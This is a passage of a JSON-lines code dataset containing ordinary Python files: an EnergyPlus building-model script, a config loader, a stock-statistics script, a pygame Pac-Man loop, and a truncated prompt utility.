obj11[\"Humidity Ratio at Maximum Dry-Bulb\"] = None\n obj11[\"Enthalpy at Maximum Dry-Bulb\"] = None\n obj11[\"Daily Wet-Bulb Temperature Range\"] = None\n obj11[\"Barometric Pressure\"] = 99063.21\n obj11[\"Wind Speed\"] = 4.6\n obj11[\"Wind Direction\"] = 270.0\n obj11[\"Rain Indicator\"] = \"No\"\n obj11[\"Snow Indicator\"] = \"No\"\n obj11[\"Daylight Saving Time Indicator\"] = \"No\"\n obj11[\"Solar Model Indicator\"] = \"ASHRAEClearSky\"\n obj11[\"Beam Solar Day Schedule Name\"] = None\n obj11[\"Diffuse Solar Day Schedule Name\"] = None\n obj11[\"ASHRAE Clear Sky Optical Depth for Beam Irradiance (taub)\"] = None\n obj11[\n \"ASHRAE Clear Sky Optical Depth for Diffuse Irradiance (taud)\"] = None\n obj11[\"Sky Clearness\"] = 0.0\n idf.add(obj11)\n\n obj12 = IDF._create_datadict(\"Site:GroundTemperature:BuildingSurface\")\n obj12[\"January Ground Temperature\"] = 18.3\n obj12[\"February Ground Temperature\"] = 18.2\n obj12[\"March Ground Temperature\"] = 18.3\n obj12[\"April Ground Temperature\"] = 18.4\n obj12[\"May Ground Temperature\"] = 20.1\n obj12[\"June Ground Temperature\"] = 22.0\n obj12[\"July Ground Temperature\"] = 22.3\n obj12[\"August Ground Temperature\"] = 22.5\n obj12[\"September Ground Temperature\"] = 22.5\n obj12[\"October Ground Temperature\"] = 20.7\n obj12[\"November Ground Temperature\"] = 18.9\n obj12[\"December Ground Temperature\"] = 18.5\n idf.add(obj12)\n\n obj13 = IDF._create_datadict(\"Material\")\n obj13[\"Name\"] = \"PLASTERBOARD-1\"\n obj13[\"Roughness\"] = \"MediumSmooth\"\n obj13[\"Thickness\"] = 0.012\n obj13[\"Conductivity\"] = 0.16\n obj13[\"Density\"] = 950.0\n obj13[\"Specific Heat\"] = 840.0\n obj13[\"Thermal Absorptance\"] = 0.9\n obj13[\"Solar Absorptance\"] = 0.6\n obj13[\"Visible Absorptance\"] = 0.6\n idf.add(obj13)\n\n obj14 = IDF._create_datadict(\"Material\")\n obj14[\"Name\"] = \"FIBERGLASS QUILT-1\"\n obj14[\"Roughness\"] = \"Rough\"\n obj14[\"Thickness\"] = 0.066\n obj14[\"Conductivity\"] = 0.04\n obj14[\"Density\"] = 12.0\n obj14[\"Specific Heat\"] = 840.0\n obj14[\"Thermal Absorptance\"] = 0.9\n obj14[\"Solar Absorptance\"] = 0.6\n obj14[\"Visible Absorptance\"] = 0.6\n idf.add(obj14)\n\n obj15 = IDF._create_datadict(\"Material\")\n obj15[\"Name\"] = \"WOOD SIDING-1\"\n obj15[\"Roughness\"] = 
\"Rough\"\n obj15[\"Thickness\"] = 0.009\n obj15[\"Conductivity\"] = 0.14\n obj15[\"Density\"] = 530.0\n obj15[\"Specific Heat\"] = 900.0\n obj15[\"Thermal Absorptance\"] = 0.9\n obj15[\"Solar Absorptance\"] = 0.6\n obj15[\"Visible Absorptance\"] = 0.6\n idf.add(obj15)\n\n obj16 = IDF._create_datadict(\"Material\")\n obj16[\"Name\"] = \"PLASTERBOARD-2\"\n obj16[\"Roughness\"] = \"Rough\"\n obj16[\"Thickness\"] = 0.01\n obj16[\"Conductivity\"] = 0.16\n obj16[\"Density\"] = 950.0\n obj16[\"Specific Heat\"] = 840.0\n obj16[\"Thermal Absorptance\"] = 0.9\n obj16[\"Solar Absorptance\"] = 0.6\n obj16[\"Visible Absorptance\"] = 0.6\n idf.add(obj16)\n\n obj17 = IDF._create_datadict(\"Material\")\n obj17[\"Name\"] = \"FIBERGLASS QUILT-2\"\n obj17[\"Roughness\"] = \"Rough\"\n obj17[\"Thickness\"] = 0.1118\n obj17[\"Conductivity\"] = 0.04\n obj17[\"Density\"] = 12.0\n obj17[\"Specific Heat\"] = 840.0\n obj17[\"Thermal Absorptance\"] = 0.9\n obj17[\"Solar Absorptance\"] = 0.6\n obj17[\"Visible Absorptance\"] = 0.6\n idf.add(obj17)\n\n obj18 = IDF._create_datadict(\"Material\")\n obj18[\"Name\"] = \"ROOF DECK\"\n obj18[\"Roughness\"] = \"Rough\"\n obj18[\"Thickness\"] = 0.019\n obj18[\"Conductivity\"] = 0.14\n obj18[\"Density\"] = 530.0\n obj18[\"Specific Heat\"] = 900.0\n obj18[\"Thermal Absorptance\"] = 0.9\n obj18[\"Solar Absorptance\"] = 0.6\n obj18[\"Visible Absorptance\"] = 0.6\n idf.add(obj18)\n\n obj19 = IDF._create_datadict(\"Material\")\n obj19[\"Name\"] = \"HF-C5\"\n obj19[\"Roughness\"] = \"MediumRough\"\n obj19[\"Thickness\"] = 0.1015\n obj19[\"Conductivity\"] = 1.7296\n obj19[\"Density\"] = 2243.0\n obj19[\"Specific Heat\"] = 837.0\n obj19[\"Thermal Absorptance\"] = 0.9\n obj19[\"Solar Absorptance\"] = 0.65\n obj19[\"Visible Absorptance\"] = 0.65\n idf.add(obj19)\n\n obj20 = IDF._create_datadict(\"Construction\")\n obj20[\"Name\"] = \"LTWALL\"\n obj20[\"Outside Layer\"] = \"WOOD SIDING-1\"\n obj20[\"Layer 2\"] = \"FIBERGLASS QUILT-1\"\n obj20[\"Layer 3\"] = \"PLASTERBOARD-1\"\n idf.add(obj20)\n\n obj21 = IDF._create_datadict(\"Construction\")\n obj21[\"Name\"] = \"LTFLOOR\"\n obj21[\"Outside Layer\"] = \"HF-C5\"\n idf.add(obj21)\n\n obj22 = IDF._create_datadict(\"Construction\")\n obj22[\"Name\"] = \"LTROOF\"\n obj22[\"Outside Layer\"] = \"ROOF DECK\"\n obj22[\"Layer 2\"] = \"FIBERGLASS QUILT-2\"\n obj22[\"Layer 3\"] = \"PLASTERBOARD-2\"\n idf.add(obj22)\n\n obj23 = IDF._create_datadict(\"Zone\")\n obj23[\"Name\"] = \"ZONE ONE\"\n obj23[\"Direction of Relative North\"] = 0.0\n obj23[\"X Origin\"] = 0.0\n obj23[\"Y Origin\"] = 0.0\n obj23[\"Z Origin\"] = 0.0\n obj23[\"Type\"] = 1\n obj23[\"Multiplier\"] = 1\n obj23[\"Ceiling Height\"] = 2.7\n obj23[\"Volume\"] = 129.6\n idf.add(obj23)\n\n obj24 = IDF._create_datadict(\"GlobalGeometryRules\")\n obj24[\"Starting Vertex Position\"] = \"UpperLeftCorner\"\n obj24[\"Vertex Entry Direction\"] = \"Counterclockwise\"\n obj24[\"Coordinate System\"] = \"World\"\n idf.add(obj24)\n\n obj25 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj25[\"Name\"] = \"SURFACE NORTH\"\n obj25[\"Surface Type\"] = \"Wall\"\n obj25[\"Construction Name\"] = \"LTWALL\"\n obj25[\"Zone Name\"] = \"ZONE ONE\"\n obj25[\"Outside Boundary Condition\"] = \"Outdoors\"\n obj25[\"Outside Boundary Condition Object\"] = None\n obj25[\"Sun Exposure\"] = \"SunExposed\"\n obj25[\"Wind Exposure\"] = \"WindExposed\"\n obj25[\"View Factor to Ground\"] = 0.5\n obj25[\"Number of Vertices\"] = 4.0\n obj25.add_extensible(8.0, 6.0, 2.7)\n obj25.add_extensible(8.0, 6.0, 0.0)\n 
obj25.add_extensible(0.0, 6.0, 0.0)\n obj25.add_extensible(0.0, 6.0, 2.7)\n idf.add(obj25)\n\n obj26 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj26[\"Name\"] = \"ZONE SURFACE EAST\"\n obj26[\"Surface Type\"] = \"Wall\"\n obj26[\"Construction Name\"] = \"LTWALL\"\n obj26[\"Zone Name\"] = \"ZONE ONE\"\n obj26[\"Outside Boundary Condition\"] = \"Outdoors\"\n obj26[\"Outside Boundary Condition Object\"] = None\n obj26[\"Sun Exposure\"] = \"SunExposed\"\n obj26[\"Wind Exposure\"] = \"WindExposed\"\n obj26[\"View Factor to Ground\"] = 0.5\n obj26[\"Number of Vertices\"] = 4.0\n obj26.add_extensible(8.0, 0.0, 2.7)\n obj26.add_extensible(8.0, 0.0, 0.0)\n obj26.add_extensible(8.0, 6.0, 0.0)\n obj26.add_extensible(8.0, 6.0, 2.7)\n idf.add(obj26)\n\n obj27 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj27[\"Name\"] = \"ZONE SURFACE SOUTH\"\n obj27[\"Surface Type\"] = \"Wall\"\n obj27[\"Construction Name\"] = \"LTWALL\"\n obj27[\"Zone Name\"] = \"ZONE ONE\"\n obj27[\"Outside Boundary Condition\"] = \"Outdoors\"\n obj27[\"Outside Boundary Condition Object\"] = None\n obj27[\"Sun Exposure\"] = \"SunExposed\"\n obj27[\"Wind Exposure\"] = \"WindExposed\"\n obj27[\"View Factor to Ground\"] = 0.5\n obj27[\"Number of Vertices\"] = 4.0\n obj27.add_extensible(0.0, 0.0, 2.7)\n obj27.add_extensible(0.0, 0.0, 0.0)\n obj27.add_extensible(8.0, 0.0, 0.0)\n obj27.add_extensible(8.0, 0.0, 2.7)\n idf.add(obj27)\n\n obj28 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj28[\"Name\"] = \"ZONE SURFACE WEST\"\n obj28[\"Surface Type\"] = \"Wall\"\n obj28[\"Construction Name\"] = \"LTWALL\"\n obj28[\"Zone Name\"] = \"ZONE ONE\"\n obj28[\"Outside Boundary Condition\"] = \"Outdoors\"\n obj28[\"Outside Boundary Condition Object\"] = None\n obj28[\"Sun Exposure\"] = \"SunExposed\"\n obj28[\"Wind Exposure\"] = \"WindExposed\"\n obj28[\"View Factor to Ground\"] = 0.5\n obj28[\"Number of Vertices\"] = 4.0\n obj28.add_extensible(0.0, 6.0, 2.7)\n obj28.add_extensible(0.0, 6.0, 0.0)\n obj28.add_extensible(0.0, 0.0, 0.0)\n obj28.add_extensible(0.0, 0.0, 2.7)\n idf.add(obj28)\n\n obj29 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj29[\"Name\"] = \"ZONE SURFACE FLOOR\"\n obj29[\"Surface Type\"] = \"Floor\"\n obj29[\"Construction Name\"] = \"LTFLOOR\"\n obj29[\"Zone Name\"] = \"ZONE ONE\"\n obj29[\"Outside Boundary Condition\"] = \"Ground\"\n obj29[\"Outside Boundary Condition Object\"] = None\n obj29[\"Sun Exposure\"] = \"NoSun\"\n obj29[\"Wind Exposure\"] = \"NoWind\"\n obj29[\"View Factor to Ground\"] = 0.0\n obj29[\"Number of Vertices\"] = 4.0\n obj29.add_extensible(0.0, 0.0, 0.0)\n obj29.add_extensible(0.0, 6.0, 0.0)\n obj29.add_extensible(8.0, 6.0, 0.0)\n obj29.add_extensible(8.0, 0.0, 0.0)\n idf.add(obj29)\n\n obj30 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj30[\"Name\"] = \"ZONE SURFACE ROOF\"\n obj30[\"Surface Type\"] = \"Roof\"\n obj30[\"Construction Name\"] = \"LTROOF\"\n obj30[\"Zone Name\"] = \"ZONE ONE\"\n obj30[\"Outside Boundary Condition\"] = \"Outdoors\"\n obj30[\"Outside Boundary Condition Object\"] = None\n obj30[\"Sun Exposure\"] = \"SunExposed\"\n obj30[\"Wind Exposure\"] = \"WindExposed\"\n obj30[\"View Factor to Ground\"] = 0.0\n obj30[\"Number of Vertices\"] = 4.0\n obj30.add_extensible(0.0, 6.0, 2.7)\n obj30.add_extensible(0.0, 0.0, 2.7)\n obj30.add_extensible(8.0, 0.0, 2.7)\n obj30.add_extensible(8.0, 6.0, 2.7)\n idf.add(obj30)\n\n obj31 = IDF._create_datadict(\"ScheduleTypeLimits\")\n obj31[\"Name\"] = \"Any Number\"\n idf.add(obj31)\n\n obj32 = 
IDF._create_datadict(\"Schedule:Compact\")\n obj32[\"Name\"] = \"ALWAYS 4\"\n obj32[\"Schedule Type Limits Name\"] = \"Any Number\"\n obj32.add_extensible(\"Through: 12/31\")\n obj32.add_extensible(\"For: AllDays\")\n obj32.add_extensible(\"Until: 24:00\")\n obj32.add_extensible(\"4\")\n idf.add(obj32)\n\n obj33 = IDF._create_datadict(\"Schedule:Compact\")\n obj33[\"Name\"] = \"ALWAYS 20\"\n obj33[\"Schedule Type Limits Name\"] = \"Any Number\"\n obj33.add_extensible(\"Through: 12/31\")\n obj33.add_extensible(\"For: AllDays\")\n obj33.add_extensible(\"Until: 24:00\")\n obj33.add_extensible(\"20\")\n idf.add(obj33)\n\n obj34 = IDF._create_datadict(\"Schedule:Compact\")\n obj34[\"Name\"] = \"ALWAYS 24\"\n obj34[\"Schedule Type Limits Name\"] = \"Any Number\"\n obj34.add_extensible(\"Through: 12/31\")\n obj34.add_extensible(\"For: AllDays\")\n obj34.add_extensible(\"Until: 24:00\")\n obj34.add_extensible(\"24\")\n idf.add(obj34)\n\n obj35 = IDF._create_datadict(\"ZoneHVAC:EquipmentConnections\")\n obj35[\"Zone Name\"] = \"ZONE ONE\"\n obj35[\"Zone Conditioning Equipment List Name\"] = \"ZONE ONE Equipment\"\n obj35[\"Zone Air Inlet Node or NodeList Name\"] = \"ZONE ONE Supply Inlet\"\n obj35[\"Zone Air Exhaust Node or NodeList Name\"] = None\n obj35[\"Zone Air Node Name\"] = \"ZONE ONE Zone Air Node\"\n obj35[\"Zone Return Air Node Name\"] = \"ZONE ONE Return Outlet\"\n idf.add(obj35)\n\n obj36 = IDF._create_datadict(\"ZoneHVAC:EquipmentList\")\n obj36[\"Name\"] = \"ZONE ONE Equipment\"\n obj36.add_extensible(\n \"ZoneHVAC:IdealLoadsAirSystem\",\n \"ZONE ONE Purchased Air\",\n 1,\n 1)\n idf.add(obj36)\n\n obj37 = IDF._create_datadict(\"ZoneHVAC:IdealLoadsAirSystem\")\n obj37[\"Name\"] = \"ZONE ONE Purchased Air\"\n obj37[\"Availability Schedule Name\"] = None\n obj37[\"Zone Supply Air Node Name\"] = \"ZONE ONE Supply Inlet\"\n obj37[\"Zone Exhaust Air Node Name\"] = None\n obj37[\"Maximum Heating Supply Air Temperature\"] = 50.0\n obj37[\"Minimum Cooling Supply Air Temperature\"] = 13.0\n obj37[\"Maximum Heating Supply Air Humidity Ratio\"] = 0.015\n obj37[\"Minimum Cooling Supply Air Humidity Ratio\"] = 0.01\n obj37[\"Heating Limit\"] = \"NoLimit\"\n obj37[\"Maximum Heating Air Flow Rate\"] = None\n obj37[\"Maximum Sensible Heating Capacity\"] = None\n obj37[\"Cooling Limit\"] = \"NoLimit\"\n obj37[\"Maximum Cooling Air Flow Rate\"] = None\n obj37[\"Maximum Total Cooling Capacity\"] = None\n obj37[\"Heating Availability Schedule Name\"] = None\n obj37[\"Cooling Availability Schedule Name\"] = None\n obj37[\"Dehumidification Control Type\"] = \"ConstantSupplyHumidityRatio\"\n obj37[\"Cooling Sensible Heat Ratio\"] = None\n obj37[\"Humidification Control Type\"] = \"ConstantSupplyHumidityRatio\"\n obj37[\"Design Specification Outdoor Air Object Name\"] = None\n obj37[\"Outdoor Air Inlet Node Name\"] = None\n obj37[\"Demand Controlled Ventilation Type\"] = None\n obj37[\"Outdoor Air Economizer Type\"] = None\n obj37[\"Heat Recovery Type\"] = None\n obj37[\"Sensible Heat Recovery Effectiveness\"] = None\n obj37[\"Latent Heat Recovery Effectiveness\"] = None\n idf.add(obj37)\n\n obj38 = IDF._create_datadict(\"ZoneControl:Thermostat\")\n obj38[\"Name\"] = \"ZONE ONE Thermostat\"\n obj38[\"Zone or ZoneList Name\"] = \"ZONE ONE\"\n obj38[\"Control Type Schedule Name\"] = \"ALWAYS 4\"\n obj38[\"Control 1 Object Type\"] = \"ThermostatSetpoint:DualSetpoint\"\n obj38[\"Control 1 Name\"] = \"Office Thermostat Dual SP Control\"\n idf.add(obj38)\n\n obj39 = 
IDF._create_datadict(\"ThermostatSetpoint:DualSetpoint\")\n obj39[\"Name\"] = \"Office Thermostat Dual SP Control\"\n obj39[\"Heating Setpoint Temperature Schedule Name\"] = \"ALWAYS 20\"\n obj39[\"Cooling Setpoint Temperature Schedule Name\"] = \"ALWAYS 24\"\n idf.add(obj39)\n\n obj40 = IDF._create_datadict(\"Output:Variable\")\n obj40[\"Key Value\"] = \"*\"\n obj40[\"Variable Name\"] = \"Site Outdoor Air Drybulb Temperature\"\n obj40[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj40)\n\n obj41 = IDF._create_datadict(\"Output:Variable\")\n obj41[\"Key Value\"] = \"*\"\n obj41[\"Variable Name\"] = \"Zone Air System Sensible Cooling Energy\"\n obj41[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj41)\n\n obj42 = IDF._create_datadict(\"Output:Variable\")\n obj42[\"Key Value\"] = \"*\"\n obj42[\"Variable Name\"] = \"Zone Air System Sensible Heating Energy\"\n obj42[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj42)\n\n obj43 = IDF._create_datadict(\"Output:Variable\")\n obj43[\"Key Value\"] = \"*\"\n obj43[\"Variable Name\"] = \"Zone Air Temperature\"\n obj43[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj43)\n\n obj44 = IDF._create_datadict(\"Output:Meter\")\n obj44[\"Name\"] = \"DistrictHeating:Facility\"\n obj44[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj44)\n\n obj45 = IDF._create_datadict(\"Output:Meter\")\n obj45[\"Name\"] = \"DistrictCooling:Facility\"\n obj45[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj45)\n\n obj46 = IDF._create_datadict(\"Output:Surfaces:Drawing\")\n obj46[\"Report Type\"] = \"DXF\"\n idf.add(obj46)\n\n obj47 = IDF._create_datadict(\"Output:Constructions\")\n obj47[\"Details Type 1\"] = \"Constructions\"\n idf.add(obj47)\n\n obj48 = IDF._create_datadict(\"Output:VariableDictionary\")\n obj48[\"Key Field\"] = \"Regular\"\n idf.add(obj48)\n\n idf.save(idf_file_path)\n","sub_path":"examples/Exercise1A_named.py","file_name":"Exercise1A_named.py","file_ext":"py","file_size_in_byte":18613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"629340473","text":"from configparser import SafeConfigParser\nimport os\n\ndef get_config():\n\tconfig = SafeConfigParser()\n\tconfig_filename = \"config_shopee.conf\"\n\tconfig_filepath = os.path.join(os.path.dirname(os.path.realpath(__file__)), config_filename)\n\n\tif os.path.exists(config_filepath) == False:\n\t\tconfig_filepath = os.path.join(os.getenv(\"HOME\"), \".tests_conf\", config_filename)\n\n\tconfig.read(config_filepath)\n\n\treturn config\n","sub_path":"lib/shopee/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"8388563","text":"\ndebug = None\nimport numpy as np\nimport z\nimport rows\nimport queue\nimport buy\nimport sliding\nimport statistics\nimport table_print\nfrom scipy import stats\nimport args\n\nif debug:\n print (\"debugging {}\".format(debug))\nstart = 60\neach = 10\nistart = -1*start\nreq = start - 20\ndates = z.getp(\"dates\")\ndays_at_a_time = 22\nmonths6 = days_at_a_time * 6\n\nhalf = int(days_at_a_time / 2)\niterations = 2\nfirstdate = \"2018-03-23\"\nrecovdate = \"2020-03-23\"\nspecial = dict()\n\ndef percentile(array, flip = False, neg_only=False, considerate = None):\n considerate = considerate if considerate else array[-1]\n if neg_only :\n consideration = array[:-1]\n\n if considerate < 1:\n nchgs = [b for b in consideration if b < 1 ]\n return round(100-stats.percentileofscore(nchgs, 
considerate, kind ='strict'),1)\n    else:\n        nchgs = [b for b in consideration if b > 1 ]\n        return round(stats.percentileofscore(nchgs, considerate, kind ='strict'),1)\n\n    if not flip:\n        return round(100 - stats.percentileofscore(array[:-1], considerate, kind ='strict'),1)\n\n    return round(stats.percentileofscore(array[:-1], considerate, kind ='strict'),1)\n\nrecent_size = 4\ndef proc(astock, title = None, store = True):\n    global special\n    if debug:\n        print(\"days_at_a_time: {}\".format( days_at_a_time))\n\n    closes6m = sliding.WindowQueue(months6)\n\n    closes = sliding.WindowQueue(days_at_a_time)\n    changes = sliding.WindowQueue(days_at_a_time)\n    lows = sliding.WindowQueue(days_at_a_time, needMin=True)\n    highs = sliding.WindowQueue(days_at_a_time, needMax=True)\n\n    saved_dates = list()\n    betas = list()\n    rc = None\n    prevclose = None\n\n    betas = list()\n    one_day_changes = list()\n    lowChanges = list()\n    highChanges = list()\n    one_month_changes = list()\n    drop_froms = list()\n    one_year_changes = list()\n    month6_changes = list()\n    one_day_lows = list()\n\n    mc = buy.getFrom(\"latestmc\", astock, 9999)\n    bta = args.args.bta\n\n    for i, row in enumerate(buy.getRows(astock, firstdate)):\n        try:\n            c_low = float(row['Low'])\n            c_high = float(row['High'])\n            date = row['Date']\n            c_close = float(row[z.closekey])\n        except:\n            print(\"row : {}\".format( row ))\n            print(\"astock: {}\".format( astock))\n            print(\"firstdate: {}\".format( firstdate))\n            print(\"no low? astock: {}\".format( astock))\n            return None\n\n        if prevclose:\n            one_day_changes.append(round(c_close/prevclose,3))\n            one_day_lows.append(round(c_low/prevclose,3))\n\n        prevclose = c_close\n\n        if debug and i == 0:\n            print(\"first date:{} c_close: {}\".format( date, c_close ))\n\n        if date == recovdate:\n            rc = c_close\n        saved_dates.append(date)\n\n        if bta and mc < 1500 and mc > 500:\n            closes6m.add_tail(c_close)\n\n        closes.add_tail(c_close)\n        lows.add_tail(min(c_low, c_close))\n        highs.add_tail(max(c_high, c_close))\n\n        if closes6m.full():\n            # measure the change against the start of the 6-month window\n            first_close = closes6m.get()\n            chg = round(c_close / first_close,3)\n            month6_changes.append(chg)\n\n        if closes.full():\n\n            close_list = list(closes.main)\n\n            first_close = closes.get()\n            lowest = lows.get_minimum()\n            chg = round(lowest / first_close,4)\n            lowChanges.append(chg)\n\n            highest = highs.get_maximum()\n            chg2 = round(highest / first_close,4)\n            highChanges.append(chg2)\n\n            monthchg = round( closes.main[-1]/ first_close ,3)\n            beta = round(highest/lowest,2)\n\n            one_month_changes.append(monthchg)\n            betas.append(beta)\n\n            drop_from = round(close_list[-1]/max(close_list[:-1]),3)\n            drop_froms.append(drop_from)\n#            if debug:\n#                print(\"drop_from : {}\".format( drop_from ))\n\n\n    closes_list = list(closes.main)\n    lows_list = list(lows.main)\n\n    if args.args.live:\n        try:\n            live_price = z.getLiveData(astock, key = \"price\")\n            one_day_changes.append(live_price/c_close)\n            month_ago = list(closes.main)[-22]\n            one_month_changes.append(live_price/month_ago)\n            closes_list.append(live_price)\n            lows_list.append(live_price)\n        except:\n            pass\n\n    items = list()\n    for i, close in enumerate(closes_list):\n        consideration = closes_list[i:i+recent_size]\n        consider2 = lows_list[i:i+recent_size]\n        if len(consideration) == recent_size:\n            chg = round(min(consider2)/ consideration[0],3)\n            items.append(chg)\n\n    if month6_changes:\n        buy.addSortedHigh(\"m6_m_m\", statistics.median(month6_changes), astock, keeping = 40)\n\n    try:\n        md1 = statistics.median(items)\n    except:\n        print(\"items: {}\".format( items))\n        print (\"problem1\")\n        return\n\n    try:\n        
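# drop_froms is empty when the price history is shorter than one days_at_a_time window\n        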
drop_from = drop_froms[-1]\n except:\n print (\"problem2\")\n return\n\n drop_from_p = percentile(drop_froms)\n drop_from_p = drop_from_p if drop_from_p > 75 else None\n\n chg1p = percentile(one_day_changes, neg_only=True)\n chg1p = chg1p if chg1p > 75 else None\n beta = round(statistics.median(betas),2)\n\n one_month_negs = sum([1 if change < 1 else 0 for change in one_month_changes])\n pd1 = round(one_month_negs / len(one_month_changes),3)\n\n more20d = sum([1 if change < .80 else 0 for change in one_month_changes])\n\n wc1 = min(lowChanges)\n md = round(statistics.median(lowChanges),4)\n md2 = round(statistics.median(lowChanges[-40:]),4)\n mg = round(statistics.median(highChanges),4)\n dl = round(statistics.median(one_day_lows),4)\n gddif = round((((mg-1)*100)+(md-1)*100),4)\n target = round(c_close * md,2)\n m30c = round(statistics.median(one_month_changes),3)\n w30 = min(one_month_changes)\n\n p20 = round(float(np.percentile(lowChanges, 20)),3)\n\n chg30 = one_month_changes[-1]\n chg30p = percentile(one_month_changes, neg_only=True)\n chg30p = chg30p if chg30p > 75 else None\n\n if bta:\n buy.addPDic(astock, \"md\", md)\n buy.addPDic(astock, \"more20d\", more20d)\n buy.addPDic(astock, \"wc1\", wc1)\n buy.addPDic(astock, \"p20\", p20)\n buy.addPDic(astock, \"gddif\", gddif)\n# buy.addPDic(astock, \"beta\", beta, True)\n buy.addPDic(astock, \"m30c\", m30c)\n buy.addPDic(astock, \"pd1\", pd1, True)\n return\n\n chg1 = one_day_changes[-1] \n values = [\n (\"stock\",astock),\n (\"price\",c_close),\n (\"target\",target),\n (\"md\",md,'%'),\n (\"md1\",md1, '%'),\n (\"md2\",md2, '%'),\n (\"mg\",mg,'%'),\n (\"gddif\",gddif),\n (\"wc1\",wc1,'%'),\n (\"p20\",p20,'%'),\n (\"more20d\",more20d),\n (\"mc\", mc),\n (\"beta\",beta) ,\n (\"chg1\",chg1,'%'),\n (\"chg1p\", chg1p),\n (\"dropf\",drop_from,'%'),\n (\"dropfp\",drop_from_p),\n (\"pd1\",pd1,'o'),\n (\"chg30\",chg30, '%'),\n (\"chg30p\",chg30p),\n (\"m30c\",m30c, '%'),\n (\"owned\", buy.getFrom(\"ports\",astock)) \n ]\n\n try:\n order = buy.getFrom(\"orders\", astock)[0]\n order,value = order[1], round(order[0])\n ochg = order/c_close\n values.insert(3, (\"ochg\", ochg, \"%\"))\n values.insert(4, (\"value\", value))\n loc = \"_TO\" if astock in z.getp(\"torys\") else \"_PO\"\n values.append((\"location\", loc))\n except Exception as e:\n loc = \"\"\n ochg = \"NA\"\n value = \"NA\"\n values.insert(3, (\"ochg\", ochg, \"%\"))\n values.insert(4, (\"value\", value))\n values.append((\"location\", loc))\n\n# order = buy.getFrom(\"orders\", astock)\n# print(\"order : {}\".format( order ))\n# print(\"astock: {}\".format( astock))\n# exit()\n\n if args.came_from_list:\n values.append((args.args.stocks, args.came_from_dict[astock]))\n\n if not args.args.bta:\n values.append((\"bta\", buy.getFrom(\"savePsdic\", astock)))\n\n if store:\n table_print.store(values)\n else:\n chg5 = round(closes_list[-1] / closes_list[-5],3)\n return md, md1, md2, mg, gddif, chg1, chg1p, chg30, chg30p, chg5, wc1, target, c_close, m30c, w30, dl\n\ndef procs(astocks = None, title = None):\n if astocks:\n import sys\n current_module = sys.modules[__name__]\n current_module.stocks = astocks\n try:\n args.args.live\n except:\n import args as args\n\n for x,astock in enumerate(stocks):\n try:\n proc(astock, title)\n except Exception as e:\n print(\" current problem astock: {}\".format( astock))\n z.trace(e)\n pass\n\n if args.args.bta:\n buy.saveSorted(\"m6_m_m\")\n\n\nif __name__ == '__main__':\n procs()\n\n# if not debug:\n# print (\"NOT DEBUGGING\")\n# table_print.initiate()\n# 
if args.args.bta:\n#        buy.savePs()\n","sub_path":"python/zen/current.py","file_name":"current.py","file_ext":"py","file_size_in_byte":8863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"232081426","text":"import pygame\nfrom pacman import Pacman\nfrom cenario import Cenario\nfrom fantasma import Fantasma\nfrom constants import *\n\npygame.init()\n\nscreen = pygame.display.set_mode((800, 600), 0)\n\nif __name__ == \"__main__\":\n    size = 600 // 30\n    clock = pygame.time.Clock()\n    pacman = Pacman(size)\n    blinky = Fantasma(VERMELHO, size)\n    inky = Fantasma(CIANO, size)\n    clyde = Fantasma(LARANJA, size)\n    pinky = Fantasma(ROSA, size)\n    cenario = Cenario(size, pacman)\n    cenario.adicionar_movivel(pacman)\n    cenario.adicionar_movivel(blinky)\n    cenario.adicionar_movivel(inky)\n    cenario.adicionar_movivel(clyde)\n    cenario.adicionar_movivel(pinky)\n\n    while True:\n        # Compute the game rules\n        if cenario.estado == JOGANDO:\n            pacman.calcular_regras()\n            blinky.calcular_regras()\n            inky.calcular_regras()\n            clyde.calcular_regras()\n            pinky.calcular_regras()\n            cenario.calcular_regras()\n\n        # Draw the screen\n        screen.fill(PRETO)\n        cenario.pintar(screen)\n        pacman.pintar(screen)\n        blinky.pintar(screen)\n        inky.pintar(screen)\n        clyde.pintar(screen)\n        pinky.pintar(screen)\n        pygame.display.update()\n        clock.tick(30)\n\n        # Capture the events\n        eventos = pygame.event.get()\n        cenario.processar_eventos(eventos)\n        pacman.processar_eventos(eventos)\n","sub_path":"pacman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"462533125","text":"import six\n__all__ = [\"merge_as_list\", \"ask_to_proceed_with_overwrite\"]\n\n\ndef merge_as_list(*args):\n    out = []\n    for x in args:\n        if x is not None:\n            if isinstance(x, (list, tuple)):\n                out += x\n            else:\n                out += [x]\n    return out\n\n\ndef ask_to_proceed_with_overwrite(filepath):\n    \"\"\"Produces a prompt asking about overwriting a file.\n\n    Parameters:\n        filepath: the path to the file to be overwritten.\n\n    Returns:\n        True if we can proceed with overwrite, False otherwise.\n    \"\"\"\n    overwrite = six.moves.input('[WARNING] %s already exists - overwrite? 
